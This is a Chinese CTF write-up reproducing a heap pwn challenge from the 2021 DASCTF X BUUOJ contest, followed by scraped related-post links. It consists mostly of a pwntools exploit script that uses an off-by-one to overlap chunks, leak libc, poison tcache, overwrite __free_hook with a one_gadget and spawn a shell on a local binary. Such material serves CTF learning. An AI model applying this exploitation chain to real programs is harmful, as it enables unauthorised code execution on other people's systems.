[复现]2021 DASCTF X BUUOJ 五月大联动

由于我没ubuntu16就不复现第一个题了,直接第二个

正常的off by one

from pwn import *

context.os = 'linux'

context.log_level = "debug"

p = process('./pwn')

libc = ELF('./libc.so')

elf = ELF('./pwn')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

def add(idx, size, con):

	sla("choice:", "1")

	sla("please choice your card:", str(idx))

	sla("Infuse power:\n", str(size))

	sa("quickly!", con)

def edit(idx, con):

	sla("choice:", "2")

	sla("please choice your card\n", str(idx))

	sla("start your bomb show\n", con)

def delete(idx):

	sla("choice:", "3")

	sla("Which card:", str(idx))

def show(idx):

	sla("choice:", "4")

	sla("index:", str(idx))

add(0,0x18,'bpc')

add(1,0x20,'bpc')

add(2,0x20,'bpc')

add(3,0x20,'bpc')

for i in range(4, 11):

	add(i, 0x80, "bpc")

for i in range(4, 11):

	delete(i)

pl = 'a'*0x10 + p64(0) + p8(0x91)

edit(0,pl)

delete(1)

add(1,0x20,'bpc')

show(2)

ru("dedededededede:")

libcbase = uu64(r(6)) - 0x3EBCA0

leak('libcbase',libcbase)

free_hook = libcbase + libc.sym['__free_hook']

system = libcbase + 0x4f302

add(11,0x20,'bpc')

delete(11)

edit(2, p64(free_hook))

add(11, 0x20, "bpc")

add(12, 0x20,p64(system))

'''

0x4f2a5 execve("/bin/sh", rsp+0x40, environ)

constraints:

  rsp & 0xf == 0

  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)

constraints:

  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)

constraints:

  [rsp+0x70] == NULL

'''

#debug()

delete(12)

itr()

[复现]2021 DASCTF X BUUOJ 五月大联动-PWN的更多相关文章

  1. 从 Airflow 到 Apache DolphinScheduler,有赞大数据开发平台的调度系统演进

    点击上方 蓝字关注我们 作者 | 宋哲琦 ✎ 编 者 按 在不久前的 Apache  DolphinScheduler Meetup 2021 上,有赞大数据开发平台负责人 宋哲琦 带来了平台调度系统 ...

  2. 刷题记录:[强网杯 2019]Upload

    目录 刷题记录:[强网杯 2019]Upload 一.知识点 1.源码泄露 2.php反序列化 刷题记录:[强网杯 2019]Upload 题目复现链接:https://buuoj.cn/challe ...

  3. 刷题记录:[XNUCA2019Qualifier]EasyPHP

    目录 刷题记录:[XNUCA2019Qualifier]EasyPHP 解法一 1.error_log结合log_errors自定义错误日志 2.include_path设置包含路径 3.php_va ...

  4. Buuctf刷题:部分

    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...

  5. 【紧急】继续折腾,Log4j再发2.1.6,强烈建议升级

    背景 继前天正式发布的2.15.0之后,Apache log4j 2 团队宣布 Log4j 2.16.0 发布! 由于SLF4J适配兼容性的中断,Log4j 现在发布两个版本的SLF4J to Log ...

  6. 2012高校GIS论坛

    江苏省会议中心 南京·钟山宾馆(2012年4月21-22日) 以"突破与提升"为主题的"2012高校GIS论坛"将于4月在南京举行,由南京大学和工程中心共同承办 ...

  7. 1_ZedBoard开发板测试

    启动 将SD卡插入电脑进行格式化 格式化时,要将SD卡格式化为FAT32文件系统.块大小格式化为4096字节时后面会出现无法启动的情况,可以先复现一下这个错误.块大小我选择4096字节. 然后将Zed ...

  8. 刷题记录:[De1CTF 2019]Giftbox && Comment

    目录 刷题记录:[De1CTF 2019]Giftbox && Comment 一.知识点 1.sql注入 && totp 2.RCE 3.源码泄露 4.敏感文件读取 ...

  9. 刷题记录:[DDCTF 2019]homebrew event loop

    目录 刷题记录:[DDCTF 2019]homebrew event loop 知识点 1.逻辑漏洞 2.flask session解密 总结 刷题记录:[DDCTF 2019]homebrew ev ...

  10. 刷题记录:[CISCN2019 东北赛区 Day2 Web3]Point System

    目录 刷题记录:[CISCN2019 东北赛区 Day2 Web3]Point System 知识点 1.padding-oracle attack 2.cbc字节翻转攻击 3.FFMpeg文件读取漏 ...

随机推荐

  1. CF446D 题解

    题意 传送门 给定一张 \(n\) 个点 \(m\) 条边的无向图,每个节点有权值 \(v_i=\) \(0/1\).角色从节点 \(1\) 开始随机游走,走到 \(n\) 停止.求其经过路径上权值和 ...

  2. JS学习-setTimeout()

    setTimeout() 超时限制-节流 /* interval(),在setInterval()时间间隔到期后调用. * timeout()setTimeout()计时器到期后调用. * run() ...

  3. Oracle ASM磁盘组的常用操作

    1.查看现有磁盘组信息 select group_number gno,name,state,type,total_mb,free_mb,required_mirror_free_mb rmfmb,u ...

  4. ubuntu 系统增加源和删除源文件

    一.添加PPA源文件 语法格式:sudo add-apt-repository ppa:user/ppa-name 示例: sudo add-apt-repository ppa:sergiomeji ...

  5. centos7最小化系统安装(ifconfig找不到)

    先我们安装后centos7最小化系统后,并进入系统执行命令ifconfig,会发现系统提示命令未找到.具体展示效果如下图所示. 然后输入命令查看本机是否分配IP,执行命令ip addr ,可以发现系统 ...

  6. python爬虫实战——自动下载百度图片(文末附源码)

    用Python制作一个下载图片神器 前言 这个想法是怎么来的? 很简单,就是不想一张一张的下载图片,嫌太慢. 在很久很久以前,我比较喜欢收集各种动漫的壁纸,作为一个漫迷,自然是能收集多少就收集多少.小 ...

  7. A - Add Odd or Subtract Even

    A - Add Odd or Subtract Even 思路:其实认真观察就能发现,这个与输入的书有关系,且答案为0,1,2.先看相同,不用加减,为0,再看前小后大,因为加奇数减偶数,如果,相差奇数 ...

  8. FastReport报表金额数字转大写问题

    在使用FastReport报表打印的时候涉及到财务结算金额时,会用到大写,系统保存的都为数字,将数字转换为大写没有默认的系统内置函数,经过查阅资料,可通过对FastReport的页面设计代码修改实现: ...

  9. css/js使用小技巧记录

    1.白底小图标换色 .iconBox { position: relative; width: 19px; height: 19px; overflow: hidden; // 隐藏原本颜色的图片 . ...

  10. 【jinja2】Python根据模板生成HTML文件并加载进QWebEngineView

    前言 继前文Python在PyQt5中使用ECharts绘制图表中在Python程序中添加网页展示ECharts图表,和Python使用QWebEngineView时报错Uncaught Refere ...